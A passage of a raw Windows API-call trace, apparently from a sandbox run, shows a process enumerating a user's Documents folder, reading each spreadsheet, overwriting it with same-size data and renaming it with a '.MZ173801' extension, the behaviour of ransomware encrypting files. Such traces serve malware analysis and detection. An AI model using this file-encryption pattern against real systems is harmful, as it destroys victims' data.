0x1358 [0122.279] GetCurrentThreadId () returned 0x1358 [0122.279] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\z0bDcRFEP75Y.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\z0bdcrfep75y.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.279] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0122.279] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.280] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x9464 [0122.280] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.280] ReadFile (in: hFile=0x408, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x9464, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f418*=0x9464, lpOverlapped=0x0) returned 1 [0122.281] CloseHandle (hObject=0x408) returned 1 [0122.281] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\z0bDcRFEP75Y.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\z0bdcrfep75y.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.283] WriteFile (in: hFile=0x408, lpBuffer=0x243cc90*, nNumberOfBytesToWrite=0x9464, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x243cc90*, lpNumberOfBytesWritten=0x19f424*=0x9464, lpOverlapped=0x0) returned 1 [0122.284] CloseHandle (hObject=0x408) returned 1 [0122.284] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\z0bDcRFEP75Y.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\z0bdcrfep75y.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\z0bDcRFEP75Y.xlsx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\z0bdcrfep75y.xlsx.mz173801")) returned 1 [0122.285] GetCurrentThreadId () returned 0x1358 [0122.285] GetCurrentThreadId () returned 0x1358 [0122.285] GetCurrentThreadId () returned 0x1358 [0122.286] GetCurrentThreadId () returned 0x1358 [0122.286] GetCurrentThreadId () returned 0x1358 [0122.286] GetCurrentThreadId () returned 0x1358 [0122.286] FindNextFileW (in: hFindFile=0xa1bdc8, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0c00e0, ftCreationTime.dwHighDateTime=0x1d5e35b, ftLastAccessTime.dwLowDateTime=0x14f654b0, ftLastAccessTime.dwHighDateTime=0x1d5ec59, ftLastWriteTime.dwLowDateTime=0x14f654b0, ftLastWriteTime.dwHighDateTime=0x1d5ec59, nFileSizeHigh=0x0, nFileSizeLow=0x143fc, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="_wpuiuTlUB.xlsx", cAlternateFileName="_WPUIU~1.XLS")) returned 1 [0122.286] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.286] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.286] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\_wpuiuTlUB.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\_wpuiutlub.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0c00e0, ftCreationTime.dwHighDateTime=0x1d5e35b, ftLastAccessTime.dwLowDateTime=0x14f654b0, ftLastAccessTime.dwHighDateTime=0x1d5ec59, ftLastWriteTime.dwLowDateTime=0x14f654b0, ftLastWriteTime.dwHighDateTime=0x1d5ec59, nFileSizeHigh=0x0, nFileSizeLow=0x143fc)) returned 1 [0122.286] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.286] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.286] GetCurrentThreadId () returned 0x1358 [0122.286] GetCurrentThreadId () returned 0x1358 [0122.287] GetCurrentThreadId () returned 0x1358 [0122.287] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.287] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.287] GetCurrentThreadId () returned 0x1358 [0122.287] GetCurrentThreadId () returned 0x1358 [0122.287] GetCurrentThreadId () returned 0x1358 [0122.287] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\_wpuiuTlUB.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\_wpuiutlub.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.287] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0122.287] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.288] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x143fc [0122.288] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.288] ReadFile (in: hFile=0x408, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x143fc, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f418*=0x143fc, lpOverlapped=0x0) returned 1 [0122.289] CloseHandle (hObject=0x408) returned 1 [0122.290] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\_wpuiuTlUB.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\_wpuiutlub.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.292] WriteFile (in: hFile=0x408, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x143fc, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f424*=0x143fc, lpOverlapped=0x0) returned 1 [0122.294] CloseHandle (hObject=0x408) returned 1 [0122.294] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\_wpuiuTlUB.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\_wpuiutlub.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\_wpuiuTlUB.xlsx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\_wpuiutlub.xlsx.mz173801")) returned 1 [0122.297] GetCurrentThreadId () returned 0x1358 [0122.297] GetCurrentThreadId () returned 0x1358 [0122.297] GetCurrentThreadId () returned 0x1358 [0122.297] GetCurrentThreadId () returned 0x1358 [0122.297] GetCurrentThreadId () returned 0x1358 [0122.297] GetCurrentThreadId () returned 0x1358 [0122.297] FindNextFileW (in: hFindFile=0xa1bdc8, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0c00e0, ftCreationTime.dwHighDateTime=0x1d5e35b, ftLastAccessTime.dwLowDateTime=0x14f654b0, ftLastAccessTime.dwHighDateTime=0x1d5ec59, ftLastWriteTime.dwLowDateTime=0x14f654b0, ftLastWriteTime.dwHighDateTime=0x1d5ec59, nFileSizeHigh=0x0, nFileSizeLow=0x143fc, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="_wpuiuTlUB.xlsx", cAlternateFileName="_WPUIU~1.XLS")) returned 0 [0122.298] GetLastError () returned 0x12 [0122.298] FindClose (in: hFindFile=0xa1bdc8 | out: hFindFile=0xa1bdc8) returned 1 [0122.298] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\*.*", lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecdfdf50, ftCreationTime.dwHighDateTime=0x1d5eae6, ftLastAccessTime.dwLowDateTime=0xaa2b10ed, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xaa2b10ed, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName=".", cAlternateFileName="")) returned 0xa1bb28 [0122.298] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c8 | out: lpLocalFileTime=0x19f4c8) returned 1 [0122.298] FileTimeToDosDateTime (in: lpFileTime=0x19f4c8, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.298] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecdfdf50, ftCreationTime.dwHighDateTime=0x1d5eae6, ftLastAccessTime.dwLowDateTime=0xaa2b10ed, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xaa2b10ed, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="..", cAlternateFileName="")) returned 1 [0122.298] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.298] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.298] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x951e9970, ftCreationTime.dwHighDateTime=0x1d5ef8f, ftLastAccessTime.dwLowDateTime=0x25a9c020, ftLastAccessTime.dwHighDateTime=0x1d5e3c2, ftLastWriteTime.dwLowDateTime=0xaa10da04, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x402a, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="1d9fEi.docx.MZ173801", cAlternateFileName="1D9FEI~1.MZ1")) returned 1 [0122.298] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.298] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.298] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6675ebe0, ftCreationTime.dwHighDateTime=0x1d5e7a2, ftLastAccessTime.dwLowDateTime=0x5fed7c70, ftLastAccessTime.dwHighDateTime=0x1d5e8e2, ftLastWriteTime.dwLowDateTime=0x5fed7c70, ftLastWriteTime.dwHighDateTime=0x1d5e8e2, nFileSizeHigh=0x0, nFileSizeLow=0x145bb, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="bbDt5hQeu2UjYm.odp", cAlternateFileName="BBDT5H~1.ODP")) returned 1 [0122.298] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.298] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.298] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58c36f0, ftCreationTime.dwHighDateTime=0x1d5e10c, ftLastAccessTime.dwLowDateTime=0xbc966ab0, ftLastAccessTime.dwHighDateTime=0x1d5ed18, ftLastWriteTime.dwLowDateTime=0xaa1a6129, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x156d0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="dMoow7sypidEXF.ppt.MZ173801", cAlternateFileName="DMOOW7~1.MZ1")) returned 1 [0122.298] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.298] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.298] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb02b2f0, ftCreationTime.dwHighDateTime=0x1d5e105, ftLastAccessTime.dwLowDateTime=0xe3f51e80, ftLastAccessTime.dwHighDateTime=0x1d5e908, ftLastWriteTime.dwLowDateTime=0xe3f51e80, ftLastWriteTime.dwHighDateTime=0x1d5e908, nFileSizeHigh=0x0, nFileSizeLow=0x98f8, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="Lk3TDwyaU3iymmdwQ.ods", cAlternateFileName="LK3TDW~1.ODS")) returned 1 [0122.298] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.298] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.298] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6c31dc0, ftCreationTime.dwHighDateTime=0x1d5e13b, ftLastAccessTime.dwLowDateTime=0xf7f1d030, ftLastAccessTime.dwHighDateTime=0x1d5e882, ftLastWriteTime.dwLowDateTime=0xaa1d651c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xaccf, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="maQtnjtEPvgXKVh_.doc.MZ173801", cAlternateFileName="MAQTNJ~1.MZ1")) returned 1 [0122.298] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.298] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.298] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x637ef250, ftCreationTime.dwHighDateTime=0x1d5e168, ftLastAccessTime.dwLowDateTime=0x2cd726a0, ftLastAccessTime.dwHighDateTime=0x1d5e86b, ftLastWriteTime.dwLowDateTime=0xaa1d651c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x13909, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="nZr6PHEvCUKrD5BUDBLc.rtf.MZ173801", cAlternateFileName="NZR6PH~1.MZ1")) returned 1 [0122.298] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.298] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.298] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a0cde70, ftCreationTime.dwHighDateTime=0x1d5e654, ftLastAccessTime.dwLowDateTime=0xc6509f0, ftLastAccessTime.dwHighDateTime=0x1d5e4a6, ftLastWriteTime.dwLowDateTime=0xc6509f0, ftLastWriteTime.dwHighDateTime=0x1d5e4a6, nFileSizeHigh=0x0, nFileSizeLow=0x186d9, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="qeFEt94 ZkESq80bTrZv.ots", cAlternateFileName="QEFET9~1.OTS")) returned 1 [0122.298] FileTimeToLocalFileTime (in: 